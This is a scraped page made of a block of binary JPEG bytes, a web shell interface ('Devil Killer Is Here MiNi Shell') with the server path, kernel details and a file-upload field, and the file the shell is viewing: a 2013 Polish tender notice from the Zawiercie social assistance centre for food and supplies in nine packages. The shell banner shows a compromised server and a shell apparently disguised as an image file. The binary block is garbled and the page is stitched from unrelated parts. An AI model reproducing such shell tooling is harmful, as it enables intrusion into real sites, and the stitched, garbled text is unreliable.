JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130208/53876-N-2013.html

<p class="kh_header"><b>Zawiercie: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH I PRZEMYSŁOWYCH w projekcie Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowanym przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 53876 - 2013; data zamieszczenia: 08.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Piłsudskiego 47, 42-400 Zawiercie, woj. śląskie, tel. 032 6722134, faks 032 6727701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopszawiercie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH I PRZEMYSŁOWYCH w projekcie Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowanym przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych i przemysłowych (dotyczy działań: Warsztaty graffiti (Osz) - poczęstunek /pakiet I/, Warsztaty rewitalizacyjne - projektowanie ogrodów (Osz) - poczęstunek /pakiet II/, Impreza andrzejkowa (Osz) - zakup artykułów spożywczych i przemysłowych /pakiet III/, Impreza mikołajkowa (Osz) - zakup artykułów spożywczych i przemysłowych /pakiet IV/, Zajęcia integracyjno - artystyczne (UM) - bal karnawałowy - zakup artykułów spożywczych i przemysłowych /pakiet V/, Zajęcia integracyjno - artystyczne (UM) - Wielkanoc - zakup artykułów spożywczych i przemysłowych /pakiet VI/, Poczęstunek dla uczestników zajęć w KS i PAL /pakiet VII/, Zakup artykułów przemysłowych /pakiet VIII/, Wolontariat - poczęstunek dla wolontariuszy /pakiet IX/) w projekcie Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowanym przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Przedmiot zamówienia podzielony na pakiety (od I do IX) wyszczególniony został w wykazie asortymentowo - cenowym:
PAKIET I
Warsztaty graffiti (Osz) - poczęstunek
Pozycja	Kategoria	Ilość / jednostka
1.		Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/l
butelki plastikowe PET	12 sztuk
2.		Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	12 sztuk
3.		Paluszki o smaku sera i cebulki o wadze 200 g (+/- 10%)	20 opakowań
4.		Syrop owocowy malinowy o poj. 5 l, bez konserwantów przeznaczony do wykorzystania przy sporządzaniu napojów gorących i zimnych , jako dodatek do herbaty ,dzięki zagęszczeniu  wydajny - po rozcieńczeniu 1:9 pozwoli na otrzymanie- z jednej butelki syropu  45 litrów gotowego napoju, z możliwością montażu pompki dozującej  pozwalającej  na estetyczne i ekonomiczne dozowanie syropu, w poręcznym plastikowym opakowaniu z uchwytem do przenoszenia	1
5.		Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	10 opakowań
6.		Ciastka kruche malinowe lub maślane lub czekoladowe, waga 160 g (+/- 10%)	10 opakowań
7.		Sok w kartonie 1 l, 100% sok naturalny bez dodatku cukru, różne smaki	10 opakowań

PAKIET II
Warsztaty rewitalizacyjne - projektowanie ogrodów (Osz) - poczęstunek
Pozycja	Kategoria	Ilość / jednostka
1.		Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/l
butelki plastikowe PET	12 sztuk
2.		Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	12 sztuk
3.		Paluszki o smaku sera i cebulki o wadze 200 g (+/- 10%)	20 opakowań
4.		Syrop owocowy malinowy o poj. 5 l
 bez konserwantów
 przeznaczony do wykorzystania przy sporządzaniu napojów gorących i zimnych , jako dodatek do herbaty ,dzięki zagęszczeniu  wydajny - po rozcieńczeniu 1:9 pozwoli na otrzymanie- z jednej butelki syropu  45 litrów gotowego napoju, z możliwością montażu  pompki dozującej  pozwalającej  na estetyczne i ekonomiczne dozowanie syropu, w poręcznym plastikowym opakowaniu z uchwytem do przenoszenia	1 sztuk
5.		Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	10 opakowań
6.		Ciastka kruche malinowe lub maślane lub czekoladowe, waga 160 g (+/- 10%)	10 opakowań
7.		Sok w kartonie 1 l, 100% sok naturalny bez dodatku cukru, różne smaki	10 opakowań
8.		Herbata czarna, ekspresowa  op. 100 szt. po min. 1,4 g.	1 opakowanie
9.		Kawa rozpuszczalna 200g
100% Arabika	1 opakowanie
10.		Kawa mielona 250g 
100% Arabika	1 opakowanie
11.		Śmietanka do kawy, pakowana 10 x 10g, 10% UHT	100 sztuk

PAKIET III
Impreza andrzejkowa (Osz) - zakup artykułów spożywczych i przemysłowych
Pozycja	Kategoria	Ilość / jednostka
1.		Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/l
butelki plastikowe PET	6 sztuk
2.		Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	6 sztuk
3.		Paluszki solone o wadze  300g (+/- 10%) 	10 opakowań
4.		Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	5 opakowań
5.		Ciastka kruche malinowe lub maślane lub czekoladowe, waga 160 g (+/- 10%)	5 opakowań
6.		Pączki z marmoladą o masie co najmniej 60 g	35 sztuk
7.		Sok w kartonie 1 l, 100% sok naturalny bez dodatku cukru, różne smaki	5 opakowań
8.		Tacki tekturowe o wymiarach: 11 cm x 18 cm (+/- 2 cm)	100 sztuk 
9.		Kubeczki jednorazowe do ciepłych napojów o poj. 250 ml	100 sztuk
10.		Łyżeczki plastikowe małe	100 sztuk
11.		Worki na śmieci poj. 60 litrów	50 sztuk
12.		Ręcznik papierowy (pakowany po 2 rolki)	10 rolek
13.		Mydło w płynie z dozownikiem, poj. 500 ml	1 sztuka
14.		Serwetki, równe, gładkie, jednowarstwowe, 15cm x 15 cm	1 opakowanie 100 sztuk

PAKIET IV
Impreza mikołajkowa (Osz) - zakup artykułów spożywczych i przemysłowych 
Pozycja	Kategoria	Ilość / jednostka
1.		Sok 100 % w kartoniku ze słomką, poj. 200 ml + 25%, różne smaki	25 sztuk
2.		Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	10 sztuk
3.		Mleko zagęszczone niesłodzone, 7,5% tł., 1000g	3 sztuk
4.		Czekolada mleczna o zawartości masy kakaowej minimum 30%, 100g	45 sztuk
5.		Lizaki okrągłe, owocowy 12 g. +/- 20%	25 sztuk
6.		Żelki o smaku owocowym w opakowaniach 100g +/- 10%	25 sztuk
7.		Kruchy wafelek oblany czekoladą mleczną, waga 52 g +/- 20%	25 sztuk
8.		Owoc- pomarańcza	25 sztuk
9.		Sok w kartonie 1 l, 100% sok naturalny bez dodatku cukru, różne smaki	9 sztuk
10.		Kawa rozpuszczalna 200g
100% Arabika	1 sztuk
11.		Paluszki z sezamem, waga 220 g (+/- 10%)	7 sztuk
12.		Paluszki o smaku sera i cebulki o wadze 200 g (+/- 10%)	7 sztuk
13.		Tacki tekturowe o wymiarach: 11 cm x 18 cm (+/- 2 cm)	100 sztuk 
14.		Kubeczki jednorazowe do ciepłych napojów o poj. 250 ml	100 sztuk
15.		Łyżeczki plastikowe małe	100 sztuk
16.		Worki na śmieci poj. 60 litrów	50 sztuk
17.		Ręcznik papierowy (pakowany po 2 rolki)	10 rolek
18.		Mydło w płynie z dozownikiem, poj. 500 ml	1 sztuka
19.		Serwetki, równe, gładkie, jednowarstwowe, 15cm x 15 cm	1 opakowanie 100 sztuk

PAKIET V
Zajęcia integracyjno - artystyczne (UM) - bal karnawałowy - zakup artykułów spożywczych i przemysłowych
Pozycja	Kategoria	Ilość / jednostka
1.		Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/l
butelki plastikowe PET	6 sztuk
2.		Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	6 sztuk
3.		Paluszki solone o wadze  300g (+/- 10%)	10 opakowań
4.		Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	5 opakowań
5.		Ciastka kruche, waga 160 g (+/- 10%)	5 opakowań
6.		Sok w kartonie 1 l, 100% sok naturalny bez dodatku cukru, różne smaki	5 opakowań
7.		Tacki tekturowe o wymiarach: 11 cm x 18 cm (+/- 2 cm)	100 sztuk
8.		Kubeczki jednorazowe do ciepłych napojów o poj.250 ml	100 sztuk
9.		Łyżeczki plastikowe małe	100 sztuk
10.		Worki na śmieci poj. 60 litrów	50 sztuk
11.		Ręcznik papierowy (pakowany po 2 rolki)	10 rolek
12.		Mydło w płynie z dozownikiem, poj. 500 ml	1 sztuka
13.		Serwetki, równe, gładkie, jednowarstwowe, 15cm x 15 cm	1 opakowanie 100 sztuk

PAKIET VI
Zajęcia integracyjno - artystyczne (UM) - Wielkanoc - zakup artykułów spożywczych i przemysłowych 
Pozycja	Kategoria	Ilość / jednostka
1.		Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/l
butelki plastikowe PET	4 sztuk
2.		Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	4 sztuk
3.		Paluszki solone o wadze  300g (+/- 10%)	4 opakowania
4.		Syrop owocowy malinowy o poj. 5 l
 bez konserwantów
 przeznaczony do wykorzystania przy sporządzaniu napojów gorących i zimnych , jako dodatek do herbaty ,dzięki zagęszczeniu  wydajny - po rozcieńczeniu 1:9 pozwoli na otrzymanie- z jednej butelki syropu  45 litrów gotowego napoju, z możliwością montażu  pompki dozującej  pozwalającej  na estetyczne i ekonomiczne dozowanie syropu, w poręcznym plastikowym opakowaniu z uchwytem do przenoszenia	1
5.		Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	4 opakowań
6.		Ciastka kruche malinowe lub maślane lub czekoladowe, waga 160 g (+/- 10%)	4 opakowań
7.		Sok w kartonie 1 l, 100% sok naturalny bez dodatku cukru, różne smaki	4 opakowań
8.		Herbata czarna, ekspresowa  op. 100szt. po min. 1,4 g.	1 opakowanie 100 sztuk
9.		Kawa rozpuszczalna 200g
100% Arabika 	1 sztuk
10.		Kawa mielona 250g 
100% Arabika	1 sztuk
11.		Śmietanka do kawy, pakowana 10 x 10g, 10% UHT	100 sztuk

PAKIET VII
Poczęstunek dla uczestników zajęć w KS i PAL
Pozycja	Kategoria	Ilość / jednostka
1.		Herbata czarna, ekspresowa  op. 100szt. po min. 1,4 g.	10  op. 
2.		Paluszki solone o wadze  300g (+/- 10%)	50 op.
3.		Paluszki o smaku sera i cebulki o wadze 200 g (+/- 10%)	50 op.
4.		Ciastka kruche  czekoladowe, waga 160 g (+/- 10%)	35 op.
5.		Ciastka kruche  wiśniowe, waga 160 g (+/- 10%)	35 op.
6.		Ciastka kruche  maślane, waga 160 g (+/- 10%)	35 op.
7.		Kawa mielona 250g 
100% Arabika	20 op.
8.		Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/l
butelki plastikowe PET 	150 szt.
9.		Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	
150 szt.
10.		Cukier  sypki  kryształ biały  1 kg	5 kg

PAKIET VIII
Zakup artykułów przemysłowych 
Pozycja	Kategoria	Ilość / jednostka
1.		Tacki tekturowe o wymiarach: 11 cm x 18 cm (+/- 2 cm)	500 szt.
2.		Łyżeczki plastikowe małe	500 szt.
3.		Kubeczki jednorazowe do ciepłych napojów o poj. 250 ml	2000 szt.
4.		Ręcznik papierowy (pakowany po 2 rolki)	8 op.

PAKIET IX
Wolontariat - poczęstunek dla wolontariuszy
Pozycja	Kategoria	Ilość / jednostka
1.	Woda mineralna niegazowana o poj. 1,5l 
Naturalna woda mineralna nienasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 636, 25mg/lbutelki plastikowe PET	10 sztuk
2.	Woda gazowana o poj. 1,5l
Naturalna woda mineralna wysoko nasycona dwutlenkiem węgla, średnio zmineralizowana, poddawana procesowi napowietrzania i filtracji, ogólna zawartość składników mineralnych : min. 742mg/l
butelki plastikowe PET	10 sztuk
3	Syrop owocowy malinowy o poj.5 l, bez konserwantów przeznaczony do wykorzystania przy sporządzaniu napojów gorących i zimnych , jako dodatek do herbaty ,dzięki zagęszczeniu  wydajny - po rozcieńczeniu 1:9 pozwoli na otrzymanie- z jednej butelki syropu  45 litrów gotowego napoju, z możliwością montażu pompki dozującej  pozwalającej na estetyczne i ekonomiczne dozowanie syropu, w poręcznym plastikowym opakowaniu z uchwytem do przenoszenia	1 sztuka
4	Paluszki o smaku sera i cebulki o wadze 200 g (+/- 10%)	12 opakowań
5	Biszkopty z galaretką o smaku owocowym oblewane czekoladą mleczną, waga 147 g (+/- 10%)	12 opakowań
6	Ciastka kruche malinowe lub maślane lub czekoladowe, waga 160 g (+/- 10%)	12 opakowań
7	Kawa rozpuszczalna 200g
100% Arabika	1 opakowanie
8	Herbata czarna, ekspresowa  op. 100szt. po min. 1,4 g.	1 opakowanie
9	Kubeczki jednorazowe do ciepłych napojów o poj. 250 ml	100 sztuk
10	Łyżeczki plastikowe małe 	100 sztuk
11	Śmietanka do kawy, pakowana 10 x 10g, 10% UHT	100 sztuk
12	Kawa mielona 250g 
100% Arabika,	1 sztuka
13	Paluszki solone o wadze  300g (+/- 10%)	8 opakowań


Artykuły spożywcze będące przedmiotem umowy winny być opatrzone etykietą określającą m.in. ich wagę/pojemność i termin przydatności do spożycia. Ustala się, iż termin przydatności do spożycia artykułów spożywczych (nie dotyczy poz. 6 pakiet III i poz. 8 pakiet IV) nie może być krótszy niż 3 miesiące od dnia dostawy.
Dostawa przedmiotu umowy loco siedziba Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia (SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia (SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia (SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia (SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia (SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 4 do niniejszej specyfikacji. Do Formularza oferty należy dołączyć wypełniony zgodnie z instrukcją w nim zawartą Formularz asortymentowo - cenowy (załącznik nr 1 do SIWZ i wzoru umowy).
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 5 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
